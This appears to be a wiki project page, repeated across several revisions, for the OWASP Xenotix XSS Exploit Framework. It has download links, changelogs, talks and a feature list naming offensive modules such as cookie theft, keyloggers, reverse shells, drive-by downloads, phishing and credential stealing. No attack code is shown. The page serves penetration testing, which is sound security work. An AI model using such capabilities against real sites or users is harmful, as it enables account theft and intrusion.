{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshX2VsRG4tLUp3MzQ/view?usp=sharing Download V6 From GDrive]
MD5: 54a2335e35c47b1e5a87b163088c63ff

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Introduction to OWASP Xenotix XSS Exploit Framework'''

{{#ev:youtube|C15po4TK4Os}}

'''Detecting XSS in GET Request'''

{{#ev:youtube|fPC_stgovcU}}

'''Detecting XSS with GET Request Fuzzer'''

{{#ev:youtube|K5nbgvXvY1g}}

'''Detecting XSS with POST Request Fuzzer'''

{{#ev:youtube|AqdEG-vsywQ}}

'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''

{{#ev:youtube|J_qdm_-XVV0}}

'''Detecting XSS with Advanced Request Fuzzer'''

{{#ev:youtube|R8AgEWPFJ1g}}

'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-11-26T04:00:45Z

Ajin Abraham: Changed .RAR to .ZIP

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshX2VsRG4tLUp3MzQ/view?usp=sharing Download V6 From GDrive]
MD5: 54a2335e35c47b1e5a87b163088c63ff

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Introduction to OWASP Xenotix XSS Exploit Framework'''

{{#ev:youtube|C15po4TK4Os}}

'''Detecting XSS in GET Request'''

{{#ev:youtube|fPC_stgovcU}}

'''Detecting XSS with GET Request Fuzzer'''

{{#ev:youtube|K5nbgvXvY1g}}

'''Detecting XSS with POST Request Fuzzer'''

{{#ev:youtube|AqdEG-vsywQ}}

'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''

{{#ev:youtube|J_qdm_-XVV0}}

'''Detecting XSS with Advanced Request Fuzzer'''

{{#ev:youtube|R8AgEWPFJ1g}}

'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-11-22T16:07:30Z

Ajin Abraham:

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing Download V6 From GDrive]
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Introduction to OWASP Xenotix XSS Exploit Framework'''

{{#ev:youtube|C15po4TK4Os}}

'''Detecting XSS in GET Request'''

{{#ev:youtube|fPC_stgovcU}}

'''Detecting XSS with GET Request Fuzzer'''

{{#ev:youtube|K5nbgvXvY1g}}

'''Detecting XSS with POST Request Fuzzer'''

{{#ev:youtube|AqdEG-vsywQ}}

'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''

{{#ev:youtube|J_qdm_-XVV0}}

'''Detecting XSS with Advanced Request Fuzzer'''

{{#ev:youtube|R8AgEWPFJ1g}}

'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

